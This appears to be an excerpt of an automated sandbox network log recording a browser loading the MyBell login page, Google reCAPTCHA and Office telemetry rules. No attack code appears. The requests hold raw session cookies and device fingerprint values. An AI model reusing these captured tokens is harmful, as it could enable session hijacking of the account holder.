Source: global trafficHTTP traffic detected: GET /Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; TLP409c8162028=08e8c5f15aab2000b241841862cb126c325ec42da67f89c6fa5a3063993fc26fc041fae42e5908f80827395ca9113000284e3cac240268f8f1b815a23a7dea6e52c94a29df57fe2c39281a962802db4638eaf7f0c303c4afa5ba830a9e009b6f; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srende
Source: global trafficHTTP traffic detected: GET /ruxitagentjs_D_10299241001084140.js HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; TLP409c8162028=08e8c5f15aab2000b61c75eddd03524f4e0b3628000977b6617a486bc1130e994b8dd8528578f28c08e9b45cbb1130007ac2b57108db3776acc632a29c1a8ff0c58dd76061dacb52900dae04bb186209e90bd754a92d848fe33977472286a992; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=3160494552&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a
Source: global trafficHTTP traffic detected: GET /Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a5a08ba08fb48113000d894c9c9d27d6971a024a83cda35edea7abe9e49a46ed793544dfc3005a2dd2f05e0fd36cb61ca81f9c35d0dd8aa966b
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise.js?render=6LeHfTIaAAAAAE8TkvlCBFUqP7E52VxL6ZQnqjli&onload=onloadCallback HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2088849961&en=gticcd0a&end=1 HTTP/1.1Host: mybell.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a
Source: global trafficHTTP traffic detected: GET //Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).png HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5ClOcxYTbmY=a; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; rxvt=1730382118433|1730380318420; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; TLP409c8162028=08e8c5f15aab20005aa4ba6df11aca23adbc279f49528208e67fdcf24317d98e5780748eea1b1a5a08ba08fb48113000d894c9c9d27d6971a024a83cda3
Source: global trafficHTTP traffic detected: GET /static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; 